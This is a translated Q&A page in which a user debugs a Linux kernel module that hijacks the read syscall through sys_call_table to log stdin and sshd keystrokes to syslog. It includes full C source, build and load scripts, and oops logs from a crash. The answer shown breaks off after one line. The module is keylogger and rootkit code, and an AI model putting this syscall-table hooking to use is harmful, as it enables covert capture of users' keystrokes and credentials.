LKM崩溃取决于硬件吗?

时间:2019-06-13 10:34:28

标签: c linux-kernel hardware kernel-module

我的LKM劫持了stdin / sshd输入:https://pastebin.com/RChpbt9G

# uname -a
Linux kali 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux

我在两台计算机上都使用最新的kali2019.2https://www.kali.org/downloads/

  • 第一台计算机i5-2500K-好的。
  • 第二台计算机i7-6700HQ(硬件名称:Acer NG-G9-592-52LP / Mustang_SLS,BIOS V1.05 03/01/2016)-gaming laptop-崩溃...

Makefile:

CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)

TARGET = hacked_read
obj-m := $(TARGET).o

default:
    $(MAKE) -C $(KDIR) M=$(PWD) modules

clean:
    @rm -f *.o .*.cmd .*.flags *.mod.c *.order
    @rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
    @rm -fR .tmp*
    @rm -rf .tmp_versions

LKM代码:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>
#include <linux/time.h>
#include <linux/preempt.h>
#include <linux/delay.h>
#include <linux/cred.h>
#include <linux/sched.h>

#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>
#include <asm/atomic.h>

#define PID_MAX 32768

#define MODULE_NAME "hacked_read"

#define dbg( format, arg... )  do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... )  pr_err(  MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )

MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.2" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail@domain.com>" );


static DEFINE_SPINLOCK( mLock );
static unsigned long ( *original_read )  ( const struct pt_regs *regs );
void **sct;
static unsigned long flags; // irq flags

static atomic_t LOCK_NUMBER_ATOM        = ATOMIC_INIT(0);
static unsigned long long LOCK_NUMBER_ATOM_VAL;
static bool pids[ PID_MAX ];

static inline void rw_enable( void ) {
    asm volatile ( "pushq %rax \n"
        "movq %cr0, %rax \n"
        "andq $0xfffffffffffeffff, %rax \n"
        "movq %rax, %cr0 \n"
        "popq %rax " );
}

static inline uint64_t getcr0(void) {
    register uint64_t ret = 0;
    asm volatile (
        "movq %%cr0, %0\n"
        :"=r"(ret)
    );
    return ret;
}

static inline void rw_disable( register uint64_t val ) {
    asm volatile(
        "movq %0, %%cr0\n"
        :
        :"r"(val)
    );
}

static void* find_sym( const char *sym ) {
    static unsigned long faddr = 0; // static !!!
    // ----------- nested functions are a GCC extension ---------
    int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
        if( 0 == strcmp( (char*)data, sym ) ) {
            faddr = addr;
            return 1;
        } else return 0;
    };// --------------------------------------------------------
    kallsyms_on_each_symbol( symb_fn, (void*)sym );
    return (void*)faddr;
}

static unsigned long hacked_read_test( const struct pt_regs *regs ) {
    unsigned long r = 1;
    unsigned int fd = regs->di;
    char *buf = (char*) regs->si;
    atomic_inc( &LOCK_NUMBER_ATOM );
    pids[ task_pid_nr( current ) ] = true;
    r = original_read( regs );
    if ( fd == 0 ) { // fd == 0 --> stdin (sh, sshd)
        if ( strlen( buf ) > 0 )
            info( "hacked_read: %c\n", buf[ 0 ] );
    }
    atomic_dec( &LOCK_NUMBER_ATOM );
    pids[ task_pid_nr( current ) ] = false;
    return r;
}

int hacked_read_init( void ) {
    register uint64_t cr0;
    int cpu;
    sct = find_sym( "sys_call_table" );
    original_read = (void *)sct[ __NR_read ];
    for_each_present_cpu( cpu ) {
        spin_lock_irqsave( &mLock, flags );
        cr0 = getcr0( );
        rw_enable( );
        sct[ __NR_read ] = hacked_read_test;
        rw_disable( cr0 );
        spin_unlock_irqrestore( &mLock, flags );
    }
    info( "Module was loaded\n" );
    return 0;
}

void hacked_read_exit( void ) {
    register uint64_t cr0;
    int cpu;
    unsigned int i;
    for_each_present_cpu( cpu ) {
        spin_lock_irqsave( &mLock, flags );
        cr0 = getcr0( );
        rw_enable( );
        sct[__NR_read] = original_read;
        rw_disable( cr0 );
        spin_unlock_irqrestore( &mLock, flags );
    }
    LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
    while ( LOCK_NUMBER_ATOM_VAL != 0 ) {
        info( "Locked. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL );
        for( i = 0; i < PID_MAX; i++ ) {
            if ( pids[ i ] ) {
                info( "Locked. pid = %d\n", i );
            }
        }
        msleep( 5000 );
        LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
    }
    info( "Open. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL);
    info( "Module was unloaded\n" );
}

module_init( hacked_read_init );
module_exit( hacked_read_exit );

虽然我在i5-2500K上使用它-它是Okey,并且键盘的每个输入都很好地出现在/ var / log / syslog中。 但是,当我在i7-6700HQ上加载此模块时,它会变得疯狂并阻塞键盘,因此我以这种方式对其进行测试:

#!/bin/bash
cp -v /mnt/opt2/usr_src/programming/cpp/hacked_read/hacked_read.ko /lib/modules/4.19.0-kali4-amd64/
depmod
modprobe hacked_read
sleep 10
rmmod hacked_read

我在/ var / log / syslog中看到了这个:https://pastebin.com/D7YS3z0c

Jun 13 16:00:24 localhost kernel: [ 1624.899161] hacked_read: loading out-of-tree module taints kernel.
Jun 13 16:00:24 localhost kernel: [ 1624.899538] hacked_read: Module was loaded
Jun 13 16:00:24 localhost systemd[1]: atopacct.service: Main process exited, code=killed, status=9/KILL
Jun 13 16:00:24 localhost systemd[1]: atopacct.service: Failed with result 'signal'.
Jun 13 16:00:24 localhost kernel: [ 1624.906589] BUG: unable to handle kernel paging request at 00007fffc3497560
Jun 13 16:00:24 localhost kernel: [ 1624.906592] PGD 80000002dcbe3067 P4D 80000002dcbe3067 PUD 2e3bab067 PMD 2df01c067 PTE 8000000450ae7867
Jun 13 16:00:24 localhost kernel: [ 1624.906597] Oops: 0001 [#1] SMP PTI
Jun 13 16:00:24 localhost kernel: [ 1624.906599] CPU: 4 PID: 15874 Comm: atopacctd Tainted: G           O      4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:24 localhost kernel: [ 1624.906601] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:24 localhost kernel: [ 1624.906604] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:24 localhost kernel: [ 1624.906605] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:24 localhost kernel: [ 1624.906607] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:24 localhost kernel: [ 1624.906609] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906610] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:24 localhost kernel: [ 1624.906611] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906612] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:24 localhost kernel: [ 1624.906613] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906615] FS:  00007f28ab3d6540(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906617] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:24 localhost kernel: [ 1624.906618] CR2: 00007fffc3497560 CR3: 00000002f2e56002 CR4: 00000000003606e0
Jun 13 16:00:24 localhost kernel: [ 1624.906619] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906621] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:24 localhost kernel: [ 1624.906622] Call Trace:
Jun 13 16:00:24 localhost kernel: [ 1624.906627]  do_syscall_64+0x53/0x100
Jun 13 16:00:24 localhost kernel: [ 1624.906630]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:24 localhost kernel: [ 1624.906632] RIP: 0033:0x7f28ab2fe761
Jun 13 16:00:24 localhost kernel: [ 1624.906634] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:24 localhost kernel: [ 1624.906635] RSP: 002b:00007fffc3497528 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906637] RAX: ffffffffffffffda RBX: 0000000000000009 RCX: 00007f28ab2fe761
Jun 13 16:00:24 localhost kernel: [ 1624.906638] RDX: 0000000000003e80 RSI: 00007fffc3497560 RDI: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906639] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906641] R10: 0000000000000040 R11: 0000000000000246 R12: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906642] R13: 00007fffc3497550 R14: 00007fffc349b6c0 R15: 00007fffc349b478
Jun 13 16:00:24 localhost kernel: [ 1624.906643] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:24 localhost kernel: [ 1624.906676]  crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:24 localhost kernel: [ 1624.906712]  intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:24 localhost kernel: [ 1624.906718] CR2: 00007fffc3497560
Jun 13 16:00:24 localhost kernel: [ 1624.906719] ---[ end trace a09f35b7d83f68d8 ]---
Jun 13 16:00:24 localhost kernel: [ 1624.906722] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:24 localhost kernel: [ 1624.906723] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:24 localhost kernel: [ 1624.906725] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:24 localhost kernel: [ 1624.906726] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906727] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:24 localhost kernel: [ 1624.906728] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906730] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:24 localhost kernel: [ 1624.906731] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906732] FS:  00007f28ab3d6540(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906734] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:24 localhost kernel: [ 1624.906735] CR2: 00007fffc3497560 CR3: 00000002f2e56002 CR4: 00000000003606e0
Jun 13 16:00:24 localhost kernel: [ 1624.906736] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906737] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:25 localhost kernel: [ 1625.433687] BUG: unable to handle kernel paging request at 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.433695] PGD 80000002e39d0067 P4D 80000002e39d0067 PUD 2e332d067 PMD 2d13bc067 PTE 80000002b4f9a867
Jun 13 16:00:25 localhost kernel: [ 1625.433708] Oops: 0001 [#2] SMP PTI
Jun 13 16:00:25 localhost kernel: [ 1625.433716] CPU: 3 PID: 21500 Comm: grep Tainted: G      D    O      4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:25 localhost kernel: [ 1625.433719] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:25 localhost kernel: [ 1625.433729] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:25 localhost kernel: [ 1625.433734] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:25 localhost kernel: [ 1625.433738] RSP: 0018:ffff9f1dc5f4ff20 EFLAGS: 00010246
Jun 13 16:00:25 localhost kernel: [ 1625.433744] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433747] RDX: 0000000000000000 RSI: ffff8eb7ef52c020 RDI: 0000000000000001
Jun 13 16:00:25 localhost kernel: [ 1625.433751] RBP: 0000556becd76d67 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433755] R10: ffff9f1dc5f4feb0 R11: 0000000000000001 R12: 00000000000000d8
Jun 13 16:00:25 localhost kernel: [ 1625.433758] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433763] FS:  00007f578746fb80(0000) GS:ffff8eb7f1ac0000(0000) knlGS:0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433767] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:25 localhost kernel: [ 1625.433771] CR2: 0000556becd76d67 CR3: 00000002b792c006 CR4: 00000000003606e0
Jun 13 16:00:25 localhost kernel: [ 1625.433775] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433779] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:25 localhost kernel: [ 1625.433782] Call Trace:
Jun 13 16:00:25 localhost kernel: [ 1625.433795]  do_syscall_64+0x53/0x100
Jun 13 16:00:25 localhost kernel: [ 1625.433804]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:25 localhost kernel: [ 1625.433810] RIP: 0033:0x7f578757c761
Jun 13 16:00:25 localhost kernel: [ 1625.433815] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:25 localhost kernel: [ 1625.433819] RSP: 002b:00007ffd300aaaa8 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433824] RAX: ffffffffffffffda RBX: 000000000000e000 RCX: 00007f578757c761
Jun 13 16:00:25 localhost kernel: [ 1625.433828] RDX: 000000000000e000 RSI: 0000556becd76d67 RDI: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433832] RBP: 000000000000e000 R08: 000000000000000f R09: 0000000000019008
Jun 13 16:00:25 localhost kernel: [ 1625.433835] R10: 0000000000000004 R11: 0000000000000246 R12: 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.433839] R13: 0000000000000000 R14: 0000556becd6c800 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433843] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:25 localhost kernel: [ 1625.433931]  crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:25 localhost kernel: [ 1625.434030]  intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:25 localhost kernel: [ 1625.434046] CR2: 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.434051] ---[ end trace a09f35b7d83f68d9 ]---
Jun 13 16:00:25 localhost kernel: [ 1625.434058] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:25 localhost kernel: [ 1625.434063] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:25 localhost kernel: [ 1625.434066] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:25 localhost kernel: [ 1625.434071] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434074] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:25 localhost kernel: [ 1625.434078] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434081] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:25 localhost kernel: [ 1625.434085] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434090] FS:  00007f578746fb80(0000) GS:ffff8eb7f1ac0000(0000) knlGS:0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434093] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:25 localhost kernel: [ 1625.434097] CR2: 0000556becd76d67 CR3: 00000002b792c006 CR4: 00000000003606e0
Jun 13 16:00:25 localhost kernel: [ 1625.434101] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434105] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:35 localhost kernel: [ 1635.419417] BUG: unable to handle kernel paging request at 00007ffd57fa5d6f
Jun 13 16:00:35 localhost kernel: [ 1635.419427] PGD 80000002dc983067 P4D 80000002dc983067 PUD 2d80bd067 PMD 2f3d2d067 PTE 80000003254c4867
Jun 13 16:00:35 localhost kernel: [ 1635.419442] Oops: 0001 [#3] SMP PTI
Jun 13 16:00:35 localhost kernel: [ 1635.419450] CPU: 4 PID: 21549 Comm: atop Tainted: G      D    O      4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:35 localhost kernel: [ 1635.419454] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:35 localhost kernel: [ 1635.419464] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:35 localhost kernel: [ 1635.419470] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:35 localhost kernel: [ 1635.419475] RSP: 0018:ffff9f1dc6437f20 EFLAGS: 00010246
Jun 13 16:00:35 localhost kernel: [ 1635.419481] RAX: fffffffffffffe00 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419485] RDX: 0000000000000000 RSI: 0000000000000257 RDI: ffff8eb632d9fc28
Jun 13 16:00:35 localhost kernel: [ 1635.419489] RBP: 00007ffd57fa5d6f R08: 0000714c40000000 R09: 0000000000025d19
Jun 13 16:00:35 localhost kernel: [ 1635.419494] R10: 0000000000026611 R11: 0000017cc5933f1e R12: fffffffffffffe00
Jun 13 16:00:35 localhost kernel: [ 1635.419497] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419503] FS:  00007fa66b6b9d40(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419508] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:35 localhost kernel: [ 1635.419512] CR2: 00007ffd57fa5d6f CR3: 00000002e31fe005 CR4: 00000000003606e0
Jun 13 16:00:35 localhost kernel: [ 1635.419517] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419521] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:35 localhost kernel: [ 1635.419524] Call Trace:
Jun 13 16:00:35 localhost kernel: [ 1635.419538]  do_syscall_64+0x53/0x100
Jun 13 16:00:35 localhost kernel: [ 1635.419548]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:35 localhost kernel: [ 1635.419555] RIP: 0033:0x7fa66b7cd761
Jun 13 16:00:35 localhost kernel: [ 1635.419560] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:35 localhost kernel: [ 1635.419565] RSP: 002b:00007ffd57fa5d38 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419571] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fa66b7cd761
Jun 13 16:00:35 localhost kernel: [ 1635.419575] RDX: 0000000000000001 RSI: 00007ffd57fa5d6f RDI: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419579] RBP: 000056148ad79380 R08: 0000000000000000 R09: 000000000000ffff
Jun 13 16:00:35 localhost kernel: [ 1635.419583] R10: 0000000000000008 R11: 0000000000000246 R12: 00000000000003e8
Jun 13 16:00:35 localhost kernel: [ 1635.419587] R13: 000056148ad93380 R14: 000056148ad3bd20 R15: 00005614890723a6
Jun 13 16:00:35 localhost kernel: [ 1635.419592] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:35 localhost kernel: [ 1635.419690]  crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:35 localhost kernel: [ 1635.419800]  intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:35 localhost kernel: [ 1635.419817] CR2: 00007ffd57fa5d6f

如果您阅读了我之前的两个问题,那么所有问题都与LKM有关,还有其他两个问题,我在此^ {new code中已解决了这两个问题。 第一个是错误地卸载模块,因此几个进程一直调用hacked_read_test函数,并因错误can not access to this part of memory而崩溃,因为已经卸载了模块。第二个是关于围绕所有sys_call的新包装的,换句话说就是“内核代码的演化/变异”,因此通过regs出现了一种新方法。我已经解决了这个问题,因此我的新代码至少应在部分机器上运行,可能与“旧”中央处理器配合使用。

我的问题是:为什么它在i7-6700HQ上崩溃?会是什么 在不接受我的asm操作的裸机上使用“类似于XEN”虚拟机的后门程序?还是什么?

2 个答案:

答案 0 :(得分:1)

        if ( strlen( buf ) > 0 )

您正在通过以下参数调用strlen()

